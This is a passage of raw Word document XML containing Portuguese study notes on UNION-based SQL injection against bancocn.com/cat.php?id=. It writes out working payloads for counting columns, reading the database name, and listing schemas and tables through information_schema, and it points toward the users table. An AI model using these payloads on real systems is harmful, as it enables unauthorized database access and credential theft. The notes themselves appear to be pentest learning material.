            <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://bancocn.com/cat.php?id=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008B1ABB">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ORDER BY </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07485ACB" w14:textId="0B33D7C6" w:rsidR="001E272A" w:rsidRPr="00503986" w:rsidRDefault="001E272A" w:rsidP="001E272A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00503986">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e assim vai….</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B008F77" w14:textId="77777777" w:rsidR="001E272A" w:rsidRPr="00503986" w:rsidRDefault="001E272A" w:rsidP="008B1ABB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00E8A26E" w14:textId="496C82D6" w:rsidR="001E272A" w:rsidRPr="001E272A" w:rsidRDefault="001E272A" w:rsidP="008B1ABB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E272A">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Se você ir ordenando as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> colunas do id</w:t>
      </w:r>
      <w:r w:rsidRPr="001E272A">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t>, até chegar na mensagem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C160846" w14:textId="77777777" w:rsidR="0031259F" w:rsidRDefault="001E272A" w:rsidP="0031259F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0031259F">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Unknown column ‘4’ in ‘order clause’</w:t>
      </w:r>
      <w:r w:rsidR="0031259F" w:rsidRPr="0031259F">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04119BFC" w14:textId="77777777" w:rsidR="0031259F" w:rsidRDefault="0031259F" w:rsidP="0031259F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36DB2F46" w14:textId="2448487D" w:rsidR="001E272A" w:rsidRPr="0031259F" w:rsidRDefault="001E272A" w:rsidP="0031259F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E272A">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Significa que a tabela t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t>em 3 colunas</w:t>
      </w:r>
      <w:r w:rsidR="000447C6">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09424540" w14:textId="77777777" w:rsidR="00956BDC" w:rsidRDefault="00956BDC" w:rsidP="001E272A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D1B0DC0" w14:textId="77777777" w:rsidR="0097357C" w:rsidRDefault="0097357C" w:rsidP="001E272A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E2B8858" w14:textId="77777777" w:rsidR="00A37D82" w:rsidRDefault="0097357C" w:rsidP="0097357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Um outro cenário, vamos supor que você sabe quantas colunas tem a tabela e faz um </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>union</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> para pegar seus valores, conforme exemplo: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422AE301" w14:textId="0B531193" w:rsidR="0097357C" w:rsidRDefault="00000000" w:rsidP="00A37D82">
      <w:pPr>
        <w:ind w:firstLine="1134"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId47" w:history="1">
        <w:r w:rsidR="00A37D82" w:rsidRPr="00431005">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://bancocn.com/cat.php?id=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0097357C" w:rsidRPr="00A37D82">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> union select 1,2,3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61006A00" w14:textId="77777777" w:rsidR="00A37D82" w:rsidRPr="00A37D82" w:rsidRDefault="00A37D82" w:rsidP="00A37D82">
      <w:pPr>
        <w:ind w:firstLine="1134"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69D31D07" w14:textId="77777777" w:rsidR="00A37D82" w:rsidRDefault="0097357C" w:rsidP="0097357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Vai retornar somente o conteúdo do id = 1, para mostrar o select do </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>union</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> você deve colocar um id que não existe, conforme o exemplo: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD6EA9B" w14:textId="35317499" w:rsidR="0097357C" w:rsidRPr="00A37D82" w:rsidRDefault="00000000" w:rsidP="00A37D82">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId48" w:history="1">
        <w:r w:rsidR="00A37D82" w:rsidRPr="00431005">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://bancocn.com/cat.php?id=41</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0097357C" w:rsidRPr="00A37D82">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> union select 1,2,3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAF0A1E" w14:textId="77777777" w:rsidR="002844BF" w:rsidRPr="00A37D82" w:rsidRDefault="002844BF" w:rsidP="002844BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1921BC87" w14:textId="7CAD6192" w:rsidR="00E528FC" w:rsidRDefault="00E528FC" w:rsidP="00E528FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">Se você colocar: </w:t>
      </w:r>
      <w:hyperlink r:id="rId49" w:history="1">
        <w:r w:rsidRPr="00431005">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          </w:rPr>
          <w:t>http://bancocn.com/cat.php?id=41</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> union select 1,2,database()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660317FF" w14:textId="6F22D1FE" w:rsidR="00E528FC" w:rsidRDefault="00E528FC" w:rsidP="00E528FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Vai retornar o nome do banco de dados atual.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A688560" w14:textId="77777777" w:rsidR="001C0314" w:rsidRDefault="001C0314" w:rsidP="00E528FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A0C9563" w14:textId="77777777" w:rsidR="00625CDE" w:rsidRDefault="001C0314" w:rsidP="00625CDE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Outra forma de listar os bancos de dados do servidor, é fazendo uma consulta no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>information_schema,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> ele guarda várias informações do mySQL, MariaDB</w:t>
      </w:r>
      <w:r w:rsidR="00625CDE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t>, segue o exemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A68C783" w14:textId="77777777" w:rsidR="00625CDE" w:rsidRDefault="00625CDE" w:rsidP="00625CDE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6128DBCF" w14:textId="599E1078" w:rsidR="00625CDE" w:rsidRDefault="00000000" w:rsidP="00625CDE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId50" w:history="1">
        <w:r w:rsidR="00ED1F39" w:rsidRPr="00625CDE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://bancocn.com/cat.php?id=41</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00ED1F39" w:rsidRPr="00625CDE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> union select</w:t>
      </w:r>
      <w:r w:rsidR="002D7394" w:rsidRPr="00625CDE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED1F39" w:rsidRPr="00625CDE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1,2,group_concat(schema_name) from information_schema.schemata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45759D00" w14:textId="77777777" w:rsidR="00625CDE" w:rsidRPr="00625CDE" w:rsidRDefault="00625CDE" w:rsidP="00625CDE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="410FCDDA" w14:textId="572F1474" w:rsidR="00E528FC" w:rsidRDefault="00BA795B" w:rsidP="00AE78F1">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00625CDE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Obs:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA795B">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> group_concat() </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA795B">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00BA795B">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ele agrupa r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>esultados de uma consulta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5FF7CA" w14:textId="77777777" w:rsidR="00AE78F1" w:rsidRDefault="00AE78F1" w:rsidP="00AE78F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65A5F2FD" w14:textId="44496707" w:rsidR="00AE78F1" w:rsidRDefault="00AE78F1" w:rsidP="00AE78F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Se você quer listar as tabelas dentro de um banco de dados especifico, segue o exemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B56491" w14:textId="77777777" w:rsidR="006011A5" w:rsidRDefault="006011A5" w:rsidP="00AE78F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74057EA0" w14:textId="156D675B" w:rsidR="00AE78F1" w:rsidRDefault="00000000" w:rsidP="00AE78F1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId51" w:history="1">
        <w:r w:rsidR="00AE78F1" w:rsidRPr="00625CDE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://bancocn.com/cat.php?id=41</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AE78F1" w:rsidRPr="00625CDE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> union select 1,2,group_concat(</w:t>
      </w:r>
      <w:r w:rsidR="00AE78F1">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>table</w:t>
      </w:r>
      <w:r w:rsidR="00AE78F1" w:rsidRPr="00625CDE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_name) from information_schema.</w:t>
      </w:r>
      <w:r w:rsidR="00AE78F1">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tables</w:t>
      </w:r>
      <w:r w:rsidR="008170D5">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE table_schema=”bancocn”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4378288F" w14:textId="77777777" w:rsidR="00317FE3" w:rsidRDefault="00317FE3" w:rsidP="00AE78F1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="435B6744" w14:textId="412835AB" w:rsidR="00317FE3" w:rsidRPr="00317FE3" w:rsidRDefault="00317FE3" w:rsidP="00AE78F1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Resultado da consulta: (tabelas)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1297C085" w14:textId="09F851E2" w:rsidR="00317FE3" w:rsidRDefault="00317FE3" w:rsidP="00AE78F1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta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166A0878" wp14:editId="4F0309AF">
            <wp:extent cx="3189767" cy="411126"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1051724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242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636" cy="4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604F" w14:textId="40C5386A" w:rsidR="00AE78F1" w:rsidRPr="00AE78F1" w:rsidRDefault="00AE78F1" w:rsidP="00AE78F1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CF5C9D1" w14:textId="2F5AB86D" w:rsidR="00BA795B" w:rsidRDefault="00230120" w:rsidP="001636E0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00230120">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Obs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00230120">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00230120">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Existe uma tabela no</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> information_schema que guarda todas as tabelas</w:t>
      </w:r>
      <w:r w:rsidR="00F33580">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>, colunas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> de todos os bancos de dados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39554C55" w14:textId="77777777" w:rsidR="00F33580" w:rsidRDefault="00F33580" w:rsidP="001636E0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7159682D" w14:textId="45D6CFC5" w:rsidR="00F33580" w:rsidRDefault="00F33580" w:rsidP="001636E0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">Em um pentest real, provavelmente você iria tentar buscar informações sobre a tabela </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>. Pode-se fazer isso, usando também o information_schema. Segue um exemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8CA32C" w14:textId="77777777" w:rsidR="00F33580" w:rsidRDefault="00F33580" w:rsidP="001636E0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkStart w:id="27" w:name="_Hlk156611233"/>
    <w:p w14:paraId="3F533D85" w14:textId="6898CED7" w:rsidR="00327CC5" w:rsidRDefault="00327CC5" w:rsidP="00327CC5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00625CDE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText>HYPERLINK "http://bancocn.com/cat.php?id=41"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00625CDE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://bancocn.com/cat.php?id=41</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00625CDE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> union select 1,2,group_concat(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>column</w:t>
      </w:r>
      <w:r w:rsidRPr="00625CDE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
